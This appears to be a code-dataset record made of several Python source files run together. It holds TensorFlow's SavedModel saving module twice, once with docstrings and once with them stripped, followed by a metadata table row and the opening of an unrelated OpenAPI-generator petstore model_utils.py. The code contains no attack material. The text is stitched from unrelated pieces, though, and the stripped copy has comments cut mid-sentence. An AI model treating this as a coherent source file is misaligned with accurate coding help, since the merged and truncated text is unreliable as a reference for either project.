# signature. The collection is for compatibility with older loader APIs;
# only one will be executed.
meta_graph_def.collection_def[constants.MAIN_OP_KEY].node_list.value.append(
init_op.name)
meta_graph_def.signature_def[constants.INIT_OP_SIGNATURE_KEY].CopyFrom(
signature_def_utils.op_signature_def(
init_op, constants.INIT_OP_SIGNATURE_KEY))
# Saving an object-based checkpoint again gathers variables. We need to do the
# gathering from the eager context so Optimizers save the right set of
# variables, but want any operations associated with the save/restore to be in
# the exported graph (thus the `to_graph` argument).
saver = functional_saver.MultiDeviceSaver(
saveable_view.checkpoint_view.frozen_saveable_objects(
object_map=object_map, to_graph=exported_graph))
with exported_graph.as_default():
signatures = _generate_signatures(signature_functions, resource_map)
for concrete_function in saveable_view.concrete_functions:
concrete_function.add_to_graph()
saver_def = saver.to_proto()
meta_graph_def.saver_def.CopyFrom(saver_def)
graph_def = exported_graph.as_graph_def(add_shapes=True)
meta_graph_def.graph_def.CopyFrom(graph_def)
meta_graph_def.meta_info_def.tags.append(tag_constants.SERVING)
meta_graph_def.meta_info_def.tensorflow_version = versions.__version__
meta_graph_def.meta_info_def.tensorflow_git_version = (
versions.__git_version__)
# We currently always strip default attributes.
meta_graph_def.meta_info_def.stripped_default_attrs = True
meta_graph_def.meta_info_def.stripped_op_list.MergeFrom(
meta_graph.stripped_op_list_for_graph(meta_graph_def.graph_def))
meta_graph_def.asset_file_def.extend(asset_info.asset_defs)
for signature_key, signature in signatures.items():
meta_graph_def.signature_def[signature_key].CopyFrom(signature)
meta_graph.strip_graph_default_valued_attrs(meta_graph_def)
return asset_info, exported_graph
def _serialize_object_graph(saveable_view, asset_file_def_index):
"""Save a SavedObjectGraph proto for `root`."""
# SavedObjectGraph is similar to the TrackableObjectGraph proto in the
# checkpoint. It will eventually go into the SavedModel.
proto = saved_object_graph_pb2.SavedObjectGraph()
saveable_view.fill_object_graph_proto(proto)
coder = nested_structure_coder.StructureCoder()
for concrete_function in saveable_view.concrete_functions:
serialized = function_serialization.serialize_concrete_function(
concrete_function, saveable_view.captured_tensor_node_ids, coder)
if serialized is not None:
proto.concrete_functions[concrete_function.name].CopyFrom(
serialized)
for obj, obj_proto in zip(saveable_view.nodes, proto.nodes):
_write_object_proto(obj, obj_proto, asset_file_def_index)
return proto
def _write_object_proto(obj, proto, asset_file_def_index):
"""Saves an object into SavedObject proto."""
if isinstance(obj, tracking.TrackableAsset):
proto.asset.SetInParent()
proto.asset.asset_file_def_index = asset_file_def_index[obj]
elif resource_variable_ops.is_resource_variable(obj):
proto.variable.SetInParent()
if not obj.name.endswith(":0"):
raise ValueError("Cowardly refusing to save variable %s because of"
" unexpected suffix which won't be restored.")
proto.variable.name = meta_graph._op_name(obj.name) # pylint: disable=protected-access
proto.variable.trainable = obj.trainable
proto.variable.dtype = obj.dtype.as_datatype_enum
proto.variable.synchronization = obj.synchronization.value
proto.variable.aggregation = obj.aggregation.value
proto.variable.shape.CopyFrom(obj.shape.as_proto())
elif isinstance(obj, def_function.Function):
proto.function.CopyFrom(
function_serialization.serialize_function(obj))
elif isinstance(obj, defun.ConcreteFunction):
proto.bare_concrete_function.CopyFrom(
function_serialization.serialize_bare_concrete_function(obj))
elif isinstance(obj, _CapturedConstant):
proto.constant.operation = obj.graph_tensor.op.name
elif isinstance(obj, tracking.CapturableResource):
proto.resource.device = obj._resource_device # pylint: disable=protected-access
else:
registered_type_proto = revived_types.serialize(obj)
if registered_type_proto is None:
# Fallback for types with no matching registration
registered_type_proto = saved_object_graph_pb2.SavedUserObject(
identifier="_generic_user_object",
version=versions_pb2.VersionDef(
producer=1, min_consumer=1, bad_consumers=[]))
proto.user_object.CopyFrom(registered_type_proto)
@tf_export("saved_model.save",
v1=["saved_model.save", "saved_model.experimental.save"])
def save(obj, export_dir, signatures=None):
# pylint: disable=line-too-long
"""Exports the Trackable object `obj` to [SavedModel format](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/python/saved_model/README.md).
Example usage:
```python
class Adder(tf.Module):
@tf.function(input_signature=[tf.TensorSpec(shape=None, dtype=tf.float32)])
def add(self, x):
return x + x + 1.
to_export = Adder()
tf.saved_model.save(to_export, '/tmp/adder')
```
The resulting SavedModel is then servable with an input named "x", its value
having any shape and dtype float32.
The optional `signatures` argument controls which methods in `obj` will be
available to programs which consume `SavedModel`s, for example serving
APIs. Python functions may be decorated with
`@tf.function(input_signature=...)` and passed as signatures directly, or
lazily with a call to `get_concrete_function` on the method decorated with
`@tf.function`.
If the `signatures` argument is omitted, `obj` will be searched for
`@tf.function`-decorated methods. If exactly one `@tf.function` is found, that
method will be used as the default signature for the SavedModel. This behavior
is expected to change in the future, when a corresponding
`tf.saved_model.load` symbol is added. At that point signatures will be
completely optional, and any `@tf.function` attached to `obj` or its
dependencies will be exported for use with `load`.
When invoking a signature in an exported SavedModel, `Tensor` arguments are
identified by name. These names will come from the Python function's argument
names by default. They may be overridden by specifying a `name=...` argument
in the corresponding `tf.TensorSpec` object. Explicit naming is required if
multiple `Tensor`s are passed through a single argument to the Python
function.
The outputs of functions used as `signatures` must either be flat lists, in
which case outputs will be numbered, or a dictionary mapping string keys to
`Tensor`, in which case the keys will be used to name outputs.
Signatures are available in objects returned by `tf.saved_model.load` as a
`.signatures` attribute. This is a reserved attribute: `tf.saved_model.save`
on an object with a custom `.signatures` attribute will raise an exception.
Since `tf.keras.Model` objects are also Trackable, this function can be
used to export Keras models. For example, exporting with a signature
specified:
```python
class Model(tf.keras.Model):
@tf.function(input_signature=[tf.TensorSpec(shape=[None], dtype=tf.string)])
def serve(self, serialized):
...
m = Model()
tf.saved_model.save(m, '/tmp/saved_model/')
```
Exporting from a function without a fixed signature:
```python
class Model(tf.keras.Model):
@tf.function
def call(self, x):
...
m = Model()
tf.saved_model.save(
m, '/tmp/saved_model/',
signatures=m.call.get_concrete_function(
tf.TensorSpec(shape=[None, 3], dtype=tf.float32, name="inp")))
```
`tf.keras.Model` instances constructed from inputs and outputs already have a
signature and so do not require a `@tf.function` decorator or a `signatures`
argument. If neither are specified, the model's forward pass is exported.
```python
x = input_layer.Input((4,), name="x")
y = core.Dense(5, name="out")(x)
model = training.Model(x, y)
tf.saved_model.save(model, '/tmp/saved_model/')
# The exported SavedModel takes "x" with shape [None, 4] and returns "out"
# with shape [None, 5]
```
Variables must be tracked by assigning them to an attribute of a tracked
object or to an attribute of `obj` directly. TensorFlow objects (e.g. layers
from `tf.keras.layers`, optimizers from `tf.train`) track their variables
automatically. This is the same tracking scheme that `tf.train.Checkpoint`
uses, and an exported `Checkpoint` object may be restored as a training
checkpoint by pointing `tf.train.Checkpoint.restore` to the SavedModel's
"variables/" subdirectory. Currently variables are the only stateful objects
supported by `tf.saved_model.save`, but others (e.g. tables) will be supported
in the future.
`tf.function` does not hard-code device annotations from outside the function
body, instead using the calling context's device. This means for example that
exporting a model which runs on a GPU and serving it on a CPU will generally
work, with some exceptions. `tf.device` annotations inside the body of the
function will be hard-coded in the exported model; this type of annotation is
discouraged. Device-specific operations, e.g. with "cuDNN" in the name or with
device-specific layouts, may cause issues. Currently a `DistributionStrategy`
is another exception: active distribution strategies will cause device
placements to be hard-coded in a function. Exporting a single-device
computation and importing under a `DistributionStrategy` is not currently
supported, but may be in the future.
SavedModels exported with `tf.saved_model.save` [strip default-valued
attributes](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/python/saved_model/README.md#stripping-default-valued-attributes)
automatically, which removes one source of incompatibilities when the consumer
of a SavedModel is running an older TensorFlow version than the
producer. There are however other sources of incompatibilities which are not
handled automatically, such as when the exported model contains operations
which the consumer does not have definitions for.
Args:
obj: A trackable object to export.
export_dir: A directory in which to write the SavedModel.
signatures: Optional, either a `tf.function` with an input signature
specified or the result of `f.get_concrete_function` on a
`@tf.function`-decorated function `f`, in which case `f` will be used to
generate a signature for the SavedModel under the default serving
signature key. `signatures` may also be a dictionary, in which case it
maps from signature keys to either `tf.function` instances with input
signatures or concrete functions. The keys of such a dictionary may be
arbitrary strings, but will typically be from the
`tf.saved_model.signature_constants` module.
Raises:
ValueError: If `obj` is not trackable.
@compatibility(eager)
Not well supported when graph building. From TensorFlow 1.x,
`tf.compat.v1.enable_eager_execution()` should run first. Calling
tf.saved_model.save in a loop when graph building from TensorFlow 1.x will
add new save operations to the default graph each iteration.
May not be called from within a function body.
@end_compatibility
"""
if ops.inside_function():
raise AssertionError(
"tf.saved_model.save is not supported inside a traced "
"@tf.function. Move the call to the outer eagerly-executed "
"context.")
# pylint: enable=line-too-long
if not isinstance(obj, base.Trackable):
raise ValueError(
"Expected a Trackable object for export, got {}.".format(obj))
checkpoint_graph_view = _AugmentedGraphView(obj)
if signatures is None:
signatures = signature_serialization.find_function_to_export(
checkpoint_graph_view)
signatures = signature_serialization.canonicalize_signatures(signatures)
signature_serialization.validate_saveable_view(checkpoint_graph_view)
signature_map = signature_serialization.create_signature_map(signatures)
checkpoint_graph_view.add_object(
parent_node=checkpoint_graph_view.root,
name_in_parent=signature_serialization.SIGNATURE_ATTRIBUTE_NAME,
subgraph_root=signature_map)
# Use _SaveableView to provide a frozen listing of properties and functions.
# Note we run this twice since, while constructing the view the first time
# there can be side effects of creating variables.
_ = _SaveableView(checkpoint_graph_view)
saveable_view = _SaveableView(checkpoint_graph_view)
# TODO(allenl): Factor out some subset of SavedModelBuilder which is 2.x
# compatible (no sessions) and share it with this export API rather than
# making a SavedModel proto and writing it directly.
saved_model = saved_model_pb2.SavedModel()
meta_graph_def = saved_model.meta_graphs.add()
object_saver = util.TrackableSaver(checkpoint_graph_view)
asset_info, exported_graph = _fill_meta_graph_def(
meta_graph_def, saveable_view, signatures)
saved_model.saved_model_schema_version = (
constants.SAVED_MODEL_SCHEMA_VERSION)
# So far we've just been generating protocol buffers with no I/O. Now we write
# the checkpoint, copy assets into the assets directory, and write out the
# SavedModel proto itself.
utils_impl.get_or_create_variables_dir(export_dir)
object_saver.save(utils_impl.get_variables_path(export_dir))
builder_impl.copy_assets_to_destination_dir(asset_info.asset_filename_map,
export_dir)
path = os.path.join(
compat.as_bytes(export_dir),
compat.as_bytes(constants.SAVED_MODEL_FILENAME_PB))
object_graph_proto = _serialize_object_graph(
saveable_view, asset_info.asset_index)
meta_graph_def.object_graph_def.CopyFrom(object_graph_proto)
file_io.write_string_to_file(path, saved_model.SerializeToString())
# Clean reference cycles so repeated export()s don't make work for the garbage
# collector. Before this point we need to keep references to captured
# constants in the saved graph.
ops.dismantle_graph(exported_graph)
| 46.092548 | 157 | 0.755535 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
from tensorflow.core.framework import versions_pb2
from tensorflow.core.protobuf import meta_graph_pb2
from tensorflow.core.protobuf import saved_model_pb2
from tensorflow.core.protobuf import saved_object_graph_pb2
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import function as defun
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import meta_graph
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import versions
from tensorflow.python.lib.io import file_io
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.saved_model import builder_impl
from tensorflow.python.saved_model import constants
from tensorflow.python.saved_model import function_serialization
from tensorflow.python.saved_model import nested_structure_coder
from tensorflow.python.saved_model import revived_types
from tensorflow.python.saved_model import signature_constants
from tensorflow.python.saved_model import signature_def_utils
from tensorflow.python.saved_model import signature_serialization
from tensorflow.python.saved_model import tag_constants
from tensorflow.python.saved_model import utils_impl
from tensorflow.python.training.saving import functional_saver
from tensorflow.python.training.tracking import base
from tensorflow.python.training.tracking import graph_view
from tensorflow.python.training.tracking import object_identity
from tensorflow.python.training.tracking import tracking
from tensorflow.python.training.tracking import util
from tensorflow.python.util import compat
from tensorflow.python.util.tf_export import tf_export
_UNCOPIABLE_DTYPES = frozenset((dtypes.resource, dtypes.variant))
_CapturedConstant = collections.namedtuple(
"_CapturedConstant", ["eager_tensor", "graph_tensor"])
class _AugmentedGraphView(graph_view.ObjectGraphView):
def __init__(self, root):
if (not context.executing_eagerly()
and not ops.inside_function()):
saveables_cache = object_identity.ObjectIdentityWeakKeyDictionary()
else:
saveables_cache = None
super(_AugmentedGraphView, self).__init__(root, saveables_cache)
self._extra_dependencies = object_identity.ObjectIdentityDictionary()
self._functions = object_identity.ObjectIdentityDictionary()
def add_object(self, parent_node, name_in_parent, subgraph_root):
self._extra_dependencies.setdefault(
parent_node, {})[name_in_parent] = subgraph_root
def list_dependencies(self, obj):
extra_dependencies = self._extra_dependencies.get(obj, {})
used_names = set()
for name, dep in super(_AugmentedGraphView, self).list_dependencies(obj):
used_names.add(name)
if name in extra_dependencies:
yield base.TrackableReference(name, extra_dependencies[name])
else:
yield base.TrackableReference(name, dep)
for name, dep in extra_dependencies.items():
if name in used_names:
continue
yield base.TrackableReference(name, dep)
def list_functions(self, obj):
obj_functions = self._functions.get(obj, None)
if obj_functions is None:
obj_functions = obj._list_functions_for_serialization()
self._functions[obj] = obj_functions
return obj_functions
class _SaveableView(object):
def __init__(self, checkpoint_view):
self.checkpoint_view = checkpoint_view
trackable_objects, node_ids, slot_variables = (
self.checkpoint_view.objects_ids_and_slot_variables())
self.nodes = trackable_objects
self.node_ids = node_ids
self.captured_tensor_node_ids = object_identity.ObjectIdentityDictionary()
self.slot_variables = slot_variables
self.concrete_functions = []
nodes_without_functions = list(self.nodes)
seen_function_names = set()
for node in nodes_without_functions:
for function in checkpoint_view.list_functions(node).values():
if function not in self.node_ids:
self.node_ids[function] = len(self.nodes)
self.nodes.append(function)
if isinstance(function, def_function.Function):
concrete_functions = (
function._list_all_concrete_functions_for_serialization())
else:
concrete_functions = [function]
for concrete_function in concrete_functions:
if concrete_function.name not in seen_function_names:
seen_function_names.add(concrete_function.name)
self.concrete_functions.append(concrete_function)
@property
def root(self):
return self.nodes[0]
def fill_object_graph_proto(self, proto):
for node_id, node in enumerate(self.nodes):
assert self.node_ids[node] == node_id
object_proto = proto.nodes.add()
object_proto.slot_variables.extend(self.slot_variables.get(node, ()))
if isinstance(node, (def_function.Function, defun.ConcreteFunction,
_CapturedConstant)):
continue
for child in self.checkpoint_view.list_dependencies(node):
child_proto = object_proto.children.add()
child_proto.node_id = self.node_ids[child.ref]
child_proto.local_name = child.name
for local_name, ref_function in (
self.checkpoint_view.list_functions(node).items()):
child_proto = object_proto.children.add()
child_proto.node_id = self.node_ids[ref_function]
child_proto.local_name = local_name
def map_resources(self):
assert not context.executing_eagerly()
object_map = object_identity.ObjectIdentityDictionary()
resource_map = {}
asset_info = _AssetInfo(
asset_defs=[],
asset_initializers_by_resource={},
asset_filename_map={},
asset_index={})
for node_id, obj in enumerate(self.nodes):
if isinstance(obj, tracking.CapturableResource):
with ops.device(obj._resource_device):
new_resource = obj._create_resource()
resource_map[obj.resource_handle] = new_resource
self.captured_tensor_node_ids[obj.resource_handle] = node_id
elif resource_variable_ops.is_resource_variable(obj):
new_variable = resource_variable_ops.copy_to_graph_uninitialized(obj)
object_map[obj] = new_variable
resource_map[obj.handle] = new_variable.handle
self.captured_tensor_node_ids[obj.handle] = node_id
elif isinstance(obj, tracking.TrackableAsset):
_process_asset(obj, asset_info, resource_map)
self.captured_tensor_node_ids[obj.asset_path] = node_id
for concrete_function in self.concrete_functions:
for capture in concrete_function.captured_inputs:
if (tensor_util.is_tensor(capture)
and capture.dtype not in _UNCOPIABLE_DTYPES
and capture not in self.captured_tensor_node_ids):
copied_tensor = constant_op.constant(
tensor_util.constant_value(capture))
node_id = len(self.nodes)
node = _CapturedConstant(
eager_tensor=capture, graph_tensor=copied_tensor)
self.nodes.append(node)
self.node_ids[capture] = node_id
self.node_ids[node] = node_id
self.captured_tensor_node_ids[capture] = node_id
resource_map[capture] = copied_tensor
return object_map, resource_map, asset_info
def _tensor_dict_to_tensorinfo(tensor_dict):
return {key: utils_impl.build_tensor_info_internal(value)
for key, value in tensor_dict.items()}
def _map_captures_to_created_tensors(
original_captures, resource_map):
export_captures = []
for exterior, interior in original_captures.items():
mapped_resource = resource_map.get(exterior, None)
if mapped_resource is None:
raise AssertionError(
("Tried to export a function which references untracked object {}."
"TensorFlow objects (e.g. tf.Variable) captured by functions must "
"be tracked by assigning them to an attribute of a tracked object "
"or assigned to an attribute of the main object directly.")
.format(interior))
export_captures.append(mapped_resource)
return export_captures
def _map_function_arguments_to_created_inputs(
function_arguments, signature_key, function_name):
exterior_argument_placeholders = {}
mapped_inputs = []
for placeholder in function_arguments:
# find the input there then we now know we have an argument.
user_input_name = compat.as_str_any(
placeholder.op.get_attr("_user_specified_name"))
# If the internal placeholders for a function have names which were
# uniquified by TensorFlow, then a single user-specified argument name
# must refer to multiple Tensors. The resulting signatures would be
# confusing to call. Instead, we throw an exception telling the user to
# specify explicit names.
if user_input_name != placeholder.op.name:
# This should be unreachable, since concrete functions may not be
# generated with non-unique argument names.
raise ValueError(
("Got non-flat/non-unique argument names for SavedModel "
"signature '{}': more than one argument to '{}' was named '{}'. "
"Signatures have one Tensor per named input, so to have "
"predictable names Python functions used to generate these "
"signatures should avoid *args and Tensors in nested "
"structures unless unique names are specified for each. Use "
"tf.TensorSpec(..., name=...) to provide a name for a Tensor "
"input.")
.format(signature_key, compat.as_str_any(function_name),
user_input_name))
arg_placeholder = array_ops.placeholder(
shape=placeholder.shape,
dtype=placeholder.dtype,
name="{}_{}".format(signature_key, user_input_name))
exterior_argument_placeholders[user_input_name] = arg_placeholder
mapped_inputs.append(arg_placeholder)
return mapped_inputs, exterior_argument_placeholders
def _call_function_with_mapped_captures(function, args, resource_map):
export_captures = _map_captures_to_created_tensors(
function.graph.captures, resource_map)
mapped_inputs = args + export_captures
# Calls the function quite directly, since we have new captured resource
# tensors we need to feed in which weren't part of the original function
outputs = function._build_call_outputs(
function._inference_function.call(context.context(), mapped_inputs))
return outputs
def _generate_signatures(signature_functions, resource_map):
signatures = {}
for signature_key, function in sorted(signature_functions.items()):
if function.graph.captures:
argument_inputs = function.graph.inputs[:-len(function.graph.captures)]
else:
argument_inputs = function.graph.inputs
mapped_inputs, exterior_argument_placeholders = (
_map_function_arguments_to_created_inputs(
argument_inputs, signature_key, function.name))
outputs = _call_function_with_mapped_captures(
function, mapped_inputs, resource_map)
signatures[signature_key] = signature_def_utils.build_signature_def(
_tensor_dict_to_tensorinfo(exterior_argument_placeholders),
_tensor_dict_to_tensorinfo(outputs),
method_name=signature_constants.PREDICT_METHOD_NAME)
return signatures
def _trace_resource_initializers(accessible_objects):
resource_initializers = []
def _wrap_initializer(obj):
obj._initialize()
return constant_op.constant(1.)
def _wrap_obj_initializer(obj):
return lambda: _wrap_initializer(obj)
for obj in accessible_objects:
if isinstance(obj, tracking.CapturableResource):
resource_initializers.append(def_function.function(
_wrap_obj_initializer(obj),
input_signature=[]).get_concrete_function())
return resource_initializers
_AssetInfo = collections.namedtuple(
"_AssetInfo", [
"asset_defs",
"asset_initializers_by_resource",
"asset_filename_map",
"asset_index"])
def _process_asset(trackable_asset, asset_info, resource_map):
original_path_tensor = trackable_asset.asset_path
original_path = tensor_util.constant_value(original_path_tensor)
try:
original_path = str(original_path.astype(str))
except AttributeError:
pass
path = builder_impl.get_asset_filename_to_add(
asset_filepath=original_path,
asset_filename_map=asset_info.asset_filename_map)
asset_path_initializer = array_ops.placeholder(
shape=original_path_tensor.shape,
dtype=dtypes.string,
name="asset_path_initializer")
asset_variable = resource_variable_ops.ResourceVariable(
asset_path_initializer)
asset_info.asset_filename_map[path] = original_path
asset_def = meta_graph_pb2.AssetFileDef()
asset_def.filename = path
asset_def.tensor_info.name = asset_path_initializer.name
asset_info.asset_defs.append(asset_def)
asset_info.asset_initializers_by_resource[original_path_tensor] = (
asset_variable.initializer)
asset_info.asset_index[trackable_asset] = len(asset_info.asset_defs) - 1
resource_map[original_path_tensor] = asset_variable
def _fill_meta_graph_def(meta_graph_def, saveable_view, signature_functions):
accessible_objects = saveable_view.nodes
resource_initializer_functions = _trace_resource_initializers(
accessible_objects)
exported_graph = ops.Graph()
resource_initializer_ops = []
with exported_graph.as_default():
object_map, resource_map, asset_info = saveable_view.map_resources()
for resource_initializer_function in resource_initializer_functions:
asset_dependencies = []
for capture in resource_initializer_function.graph.external_captures:
asset_initializer = asset_info.asset_initializers_by_resource.get(
capture, None)
if asset_initializer is not None:
asset_dependencies.append(asset_initializer)
with ops.control_dependencies(asset_dependencies):
resource_initializer_ops.append(
_call_function_with_mapped_captures(
resource_initializer_function, [], resource_map))
resource_initializer_ops.extend(
asset_info.asset_initializers_by_resource.values())
with ops.control_dependencies(resource_initializer_ops):
init_op = control_flow_ops.no_op()
meta_graph_def.collection_def[constants.MAIN_OP_KEY].node_list.value.append(
init_op.name)
meta_graph_def.signature_def[constants.INIT_OP_SIGNATURE_KEY].CopyFrom(
signature_def_utils.op_signature_def(
init_op, constants.INIT_OP_SIGNATURE_KEY))
saver = functional_saver.MultiDeviceSaver(
saveable_view.checkpoint_view.frozen_saveable_objects(
object_map=object_map, to_graph=exported_graph))
with exported_graph.as_default():
signatures = _generate_signatures(signature_functions, resource_map)
for concrete_function in saveable_view.concrete_functions:
concrete_function.add_to_graph()
saver_def = saver.to_proto()
meta_graph_def.saver_def.CopyFrom(saver_def)
graph_def = exported_graph.as_graph_def(add_shapes=True)
meta_graph_def.graph_def.CopyFrom(graph_def)
meta_graph_def.meta_info_def.tags.append(tag_constants.SERVING)
meta_graph_def.meta_info_def.tensorflow_version = versions.__version__
meta_graph_def.meta_info_def.tensorflow_git_version = (
versions.__git_version__)
meta_graph_def.meta_info_def.stripped_default_attrs = True
meta_graph_def.meta_info_def.stripped_op_list.MergeFrom(
meta_graph.stripped_op_list_for_graph(meta_graph_def.graph_def))
meta_graph_def.asset_file_def.extend(asset_info.asset_defs)
for signature_key, signature in signatures.items():
meta_graph_def.signature_def[signature_key].CopyFrom(signature)
meta_graph.strip_graph_default_valued_attrs(meta_graph_def)
return asset_info, exported_graph
def _serialize_object_graph(saveable_view, asset_file_def_index):
proto = saved_object_graph_pb2.SavedObjectGraph()
saveable_view.fill_object_graph_proto(proto)
coder = nested_structure_coder.StructureCoder()
for concrete_function in saveable_view.concrete_functions:
serialized = function_serialization.serialize_concrete_function(
concrete_function, saveable_view.captured_tensor_node_ids, coder)
if serialized is not None:
proto.concrete_functions[concrete_function.name].CopyFrom(
serialized)
for obj, obj_proto in zip(saveable_view.nodes, proto.nodes):
_write_object_proto(obj, obj_proto, asset_file_def_index)
return proto
def _write_object_proto(obj, proto, asset_file_def_index):
if isinstance(obj, tracking.TrackableAsset):
proto.asset.SetInParent()
proto.asset.asset_file_def_index = asset_file_def_index[obj]
elif resource_variable_ops.is_resource_variable(obj):
proto.variable.SetInParent()
if not obj.name.endswith(":0"):
raise ValueError("Cowardly refusing to save variable %s because of"
" unexpected suffix which won't be restored.")
proto.variable.name = meta_graph._op_name(obj.name) # pylint: disable=protected-access
proto.variable.trainable = obj.trainable
proto.variable.dtype = obj.dtype.as_datatype_enum
proto.variable.synchronization = obj.synchronization.value
proto.variable.aggregation = obj.aggregation.value
proto.variable.shape.CopyFrom(obj.shape.as_proto())
elif isinstance(obj, def_function.Function):
proto.function.CopyFrom(
function_serialization.serialize_function(obj))
elif isinstance(obj, defun.ConcreteFunction):
proto.bare_concrete_function.CopyFrom(
function_serialization.serialize_bare_concrete_function(obj))
elif isinstance(obj, _CapturedConstant):
proto.constant.operation = obj.graph_tensor.op.name
elif isinstance(obj, tracking.CapturableResource):
proto.resource.device = obj._resource_device # pylint: disable=protected-access
else:
registered_type_proto = revived_types.serialize(obj)
if registered_type_proto is None:
# Fallback for types with no matching registration
registered_type_proto = saved_object_graph_pb2.SavedUserObject(
identifier="_generic_user_object",
version=versions_pb2.VersionDef(
producer=1, min_consumer=1, bad_consumers=[]))
proto.user_object.CopyFrom(registered_type_proto)
@tf_export("saved_model.save",
v1=["saved_model.save", "saved_model.experimental.save"])
def save(obj, export_dir, signatures=None):
# pylint: disable=line-too-long
if ops.inside_function():
raise AssertionError(
"tf.saved_model.save is not supported inside a traced "
"@tf.function. Move the call to the outer eagerly-executed "
"context.")
# pylint: enable=line-too-long
if not isinstance(obj, base.Trackable):
raise ValueError(
"Expected a Trackable object for export, got {}.".format(obj))
checkpoint_graph_view = _AugmentedGraphView(obj)
if signatures is None:
signatures = signature_serialization.find_function_to_export(
checkpoint_graph_view)
signatures = signature_serialization.canonicalize_signatures(signatures)
signature_serialization.validate_saveable_view(checkpoint_graph_view)
signature_map = signature_serialization.create_signature_map(signatures)
checkpoint_graph_view.add_object(
parent_node=checkpoint_graph_view.root,
name_in_parent=signature_serialization.SIGNATURE_ATTRIBUTE_NAME,
subgraph_root=signature_map)
# Use _SaveableView to provide a frozen listing of properties and functions.
# Note we run this twice since, while constructing the view the first time
# there can be side effects of creating variables.
_ = _SaveableView(checkpoint_graph_view)
saveable_view = _SaveableView(checkpoint_graph_view)
# TODO(allenl): Factor out some subset of SavedModelBuilder which is 2.x
# compatible (no sessions) and share it with this export API rather than
# making a SavedModel proto and writing it directly.
saved_model = saved_model_pb2.SavedModel()
meta_graph_def = saved_model.meta_graphs.add()
object_saver = util.TrackableSaver(checkpoint_graph_view)
asset_info, exported_graph = _fill_meta_graph_def(
meta_graph_def, saveable_view, signatures)
saved_model.saved_model_schema_version = (
constants.SAVED_MODEL_SCHEMA_VERSION)
# So far we've just been generating protocol buffers with no I/O. Now we write
utils_impl.get_or_create_variables_dir(export_dir)
object_saver.save(utils_impl.get_variables_path(export_dir))
builder_impl.copy_assets_to_destination_dir(asset_info.asset_filename_map,
export_dir)
path = os.path.join(
compat.as_bytes(export_dir),
compat.as_bytes(constants.SAVED_MODEL_FILENAME_PB))
object_graph_proto = _serialize_object_graph(
saveable_view, asset_info.asset_index)
meta_graph_def.object_graph_def.CopyFrom(object_graph_proto)
file_io.write_string_to_file(path, saved_model.SerializeToString())
# collector. Before this point we need to keep references to captured
# constants in the saved graph.
ops.dismantle_graph(exported_graph)
| true | true |
f73278f35cc7eb414b5cff724f44716c77daceda | 74,836 | py | Python | samples/openapi3/client/petstore/python/petstore_api/model_utils.py | mabhijith95a10/openapi-generator | 0f5e7d1e3cb9642bd46ec89ffe0bf66a922029f2 | [
"Apache-2.0"
] | 1 | 2021-04-16T03:59:56.000Z | 2021-04-16T03:59:56.000Z | samples/openapi3/client/petstore/python/petstore_api/model_utils.py | mabhijith95a10/openapi-generator | 0f5e7d1e3cb9642bd46ec89ffe0bf66a922029f2 | [
"Apache-2.0"
] | 26 | 2021-03-19T20:50:29.000Z | 2022-03-21T11:32:33.000Z | samples/openapi3/client/petstore/python/petstore_api/model_utils.py | mabhijith95a10/openapi-generator | 0f5e7d1e3cb9642bd46ec89ffe0bf66a922029f2 | [
"Apache-2.0"
] | 2 | 2021-06-11T15:24:43.000Z | 2021-06-13T12:20:31.000Z | """
OpenAPI Petstore
This spec is mainly for testing Petstore server and contains fake endpoints, models. Please do not use this for any other purpose. Special characters: \" \\ # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
from datetime import date, datetime # noqa: F401
import inspect
import io
import os
import pprint
import re
import tempfile
from dateutil.parser import parse
from petstore_api.exceptions import (
ApiKeyError,
ApiAttributeError,
ApiTypeError,
ApiValueError,
)
none_type = type(None)
file_type = io.IOBase
class cached_property(object):
# this caches the result of the function call for fn with no inputs
# use this as a decorator on fuction methods that you want converted
# into cached properties
result_key = '_results'
def __init__(self, fn):
self._fn = fn
def __get__(self, instance, cls=None):
if self.result_key in vars(self):
return vars(self)[self.result_key]
else:
result = self._fn()
setattr(self, self.result_key, result)
return result
PRIMITIVE_TYPES = (list, float, int, bool, datetime, date, str, file_type)
def allows_single_value_input(cls):
"""
This function returns True if the input composed schema model or any
descendant model allows a value only input
This is true for cases where oneOf contains items like:
oneOf:
- float
- NumberWithValidation
- StringEnum
- ArrayModel
- null
TODO: lru_cache this
"""
if (
issubclass(cls, ModelSimple) or
cls in PRIMITIVE_TYPES
):
return True
elif issubclass(cls, ModelComposed):
if not cls._composed_schemas['oneOf']:
return False
return any(allows_single_value_input(c) for c in cls._composed_schemas['oneOf'])
return False
def composed_model_input_classes(cls):
"""
This function returns a list of the possible models that can be accepted as
inputs.
TODO: lru_cache this
"""
if issubclass(cls, ModelSimple) or cls in PRIMITIVE_TYPES:
return [cls]
elif issubclass(cls, ModelNormal):
if cls.discriminator is None:
return [cls]
else:
return get_discriminated_classes(cls)
elif issubclass(cls, ModelComposed):
if not cls._composed_schemas['oneOf']:
return []
if cls.discriminator is None:
input_classes = []
for c in cls._composed_schemas['oneOf']:
input_classes.extend(composed_model_input_classes(c))
return input_classes
else:
return get_discriminated_classes(cls)
return []
class OpenApiModel(object):
"""The base class for all OpenAPIModels"""
def set_attribute(self, name, value):
# this is only used to set properties on self
path_to_item = []
if self._path_to_item:
path_to_item.extend(self._path_to_item)
path_to_item.append(name)
if name in self.openapi_types:
required_types_mixed = self.openapi_types[name]
elif self.additional_properties_type is None:
raise ApiAttributeError(
"{0} has no attribute '{1}'".format(
type(self).__name__, name),
path_to_item
)
elif self.additional_properties_type is not None:
required_types_mixed = self.additional_properties_type
if get_simple_class(name) != str:
error_msg = type_error_message(
var_name=name,
var_value=name,
valid_classes=(str,),
key_type=True
)
raise ApiTypeError(
error_msg,
path_to_item=path_to_item,
valid_classes=(str,),
key_type=True
)
if self._check_type:
value = validate_and_convert_types(
value, required_types_mixed, path_to_item, self._spec_property_naming,
self._check_type, configuration=self._configuration)
if (name,) in self.allowed_values:
check_allowed_values(
self.allowed_values,
(name,),
value
)
if (name,) in self.validations:
